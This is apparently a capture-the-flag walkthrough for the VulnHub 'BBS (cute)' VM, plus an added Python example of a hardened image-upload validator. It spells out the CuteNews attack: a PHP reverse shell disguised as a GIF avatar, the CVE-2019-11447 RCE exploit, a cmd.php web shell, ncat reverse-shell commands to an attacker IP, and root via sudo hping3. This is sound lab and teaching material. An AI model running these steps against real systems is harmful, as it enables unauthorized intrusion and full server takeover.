https://www.vulnhub.com/entry/bbs-cute-102,567/

### Fix VM network

- Debian 10; the network is broken in QEMU.
- Launch the VM and edit the GRUB parameters of the `linux ...` line: change `ro` to `rw` and add `init=/bin/bash` after it to bypass the login.
- Edit `/etc/network/interfaces`, change the interface name to ours, and add `auto enp1s0`.
### Discover Target IP

`sudo nmap -sn 192.168.122.1-255`

### Scan Ports

- `nmap -p- 192.168.122.122`
- `nmap -p 22,80,88,110,995 -sC -sV 192.168.122.122`
### Port 80

- This site doesn't have a `robots.txt`.
- Run `dirb http://192.168.122.122`; it found 83 results.

#### CuteNews

- Go to the `http://192.168.122.122/index.php` that we found. We can't log in, but we can try to register a new account.
- It requires a CAPTCHA; if we view the source of the register page at `view-source:http://192.168.122.122/index.php?register`, we can find `http://192.168.122.122/captcha.php` with the CAPTCHA.
- Once we have created an account and logged in, we can try to change our information in the Personal Options page.
- It has an option to upload an avatar picture, so we can try to upload a reverse shell script.
#### PHP Reverse Shell

- Get a copy of the PHP reverse shell script into our current directory: `cp /usr/share/webshells/php/php-reverse-shell.php .`
- Edit it and change the IP and port to the attacker's.
- Because this website checks the file's metadata, we can disguise the script by adding `GIF8;` to the beginning of the file; the system will now treat it as a GIF image.
- After uploading the image and saving the change, open a listening port on the attacker's machine: `ncat -nvlp 7373`
- Go back to the General options page, right-click the "image" we just uploaded and open it in a new tab. It takes us to `https://cute.calipendula/uploads/avatar_led_php-reverse-shell.php`, which won't work as this domain doesn't exist; we can either modify our `/etc/hosts` file on the attacker's machine or just change `cute.calipendula` to our target's IP address. Now we have a shell.
#### CVE-2019-11447

- Because it is using CuteNews 2.1.2, we can use a Remote Code Execution exploit: https://www.exploit-db.com/exploits/48800
- We need to change the path in the Python script by removing every `/CuteNews` path component, as our target's website doesn't have it. In Vim: `:%s@/CuteNews@@`
- Run it and enter our target's IP address; it will automatically create a user and give us a prompt where we can input commands.
- Start a reverse shell from here using `ncat 192.168.122.101 4444 -e /bin/bash -i`

#### By file upload

- Put this into a `cmd.php` file and upload it using the same method as uploading the avatar [above](#php-reverse-shell).
- Open the "image" in the browser, change the domain to the target's IP, add `?cmd=` and put whatever command after it: `http://192.168.122.122/uploads/avatar_led_cmd.php?cmd=whoami`
- Start a reverse shell from here using `ncat 192.168.122.101 4444 -e /bin/bash -i`
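The avatar check defeated with `GIF8;` in the PHP Reverse Shell section (and reused for `cmd.php` just above) is weak because it trusts only the first bytes of the upload and ignores the `.php` extension. As an added example that is not part of the original walkthrough or of CuteNews, here is that header sniff modelled in Python beside a hardened validator: allowlisted extension, the type's full magic number, no embedded PHP open tag, and a server-chosen stored name. The `weak_check` model and the sample uploads are constructed assumptions.

```python
import os
import re
import secrets

# Server-side allowlist of avatar types and the magic bytes each must start with.
IMAGE_MAGIC = {
    ".gif": (b"GIF87a", b"GIF89a"),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
}
# Defence in depth: an image body has no business containing a PHP open tag.
PHP_OPEN_TAG = re.compile(rb"<\?php|<\?=")


def weak_check(data: bytes) -> bool:
    """Modelled header sniff (an assumption, not CuteNews' actual code): it
    accepts anything that merely begins with 'GIF8', which 'GIF8;' satisfies."""
    return data.startswith(b"GIF8")


def hardened_check(filename: str, data: bytes) -> tuple[bool, str]:
    """Accept only an allowlisted extension whose content really starts with
    that type's full magic number and carries no PHP open tag."""
    ext = os.path.splitext(filename.lower())[1]
    if ext not in IMAGE_MAGIC:
        return False, f"extension {ext!r} not allowed"
    if not data.startswith(IMAGE_MAGIC[ext]):  # startswith accepts a tuple
        return False, "content does not match declared image type"
    if PHP_OPEN_TAG.search(data):
        return False, "embedded PHP open tag"
    return True, "ok"


def stored_name(filename: str) -> str:
    """Never reuse the client's name: store under a random name plus the
    allowlisted extension, in a directory where PHP execution is disabled."""
    ext = os.path.splitext(filename.lower())[1]
    return secrets.token_hex(16) + ext


# Constructed samples (not files from the walkthrough).
FAKE_GIF = b"GIF8;\n<?php /* constructed stand-in for a PHP body */ ?>\n"
REAL_GIF = b"GIF89a\x01\x00\x01\x00\x00\x00\x00\x3b"  # 1x1 header + trailer

if __name__ == "__main__":
    print(weak_check(FAKE_GIF))                                # True: bypassed
    print(hardened_check("php-reverse-shell.php", FAKE_GIF))  # (False, "extension '.php' not allowed")
    print(hardened_check("avatar.gif", FAKE_GIF))             # (False, "content does not match declared image type")
    print(hardened_check("avatar.gif", REAL_GIF))             # (True, "ok")
```

Note that `GIF8;` fails the hardened check even under a `.gif` name, because a real GIF header is the full `GIF87a`/`GIF89a`; the extension allowlist alone would already have stopped the `.php` upload.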
### Privilege Escalation

- Spawn a better shell with Python: `python3 -c 'import pty;pty.spawn("/bin/bash")'`
- If we run `id` we can see that `www-data` is definitely not in the `sudo` group, but we can still run `sudo -l` to see what the sudoers file allows:

```
User www-data may run the following commands on cute:
    (root) NOPASSWD: /usr/sbin/hping3 --icmp
```

- It shows that `hping3` will run as `root`. If we are still not sure, we can try `linpeas.sh` too.
- Go to https://gtfobins.github.io/gtfobins/hping3/; it shows that `hping3` keeps its elevated privileges.
- Running `whoami` inside `hping3` will show that we are root. We can run bash with the same privilege using `bash -p`; now we are in a root shell.

### Capture the flags

`cat root.txt`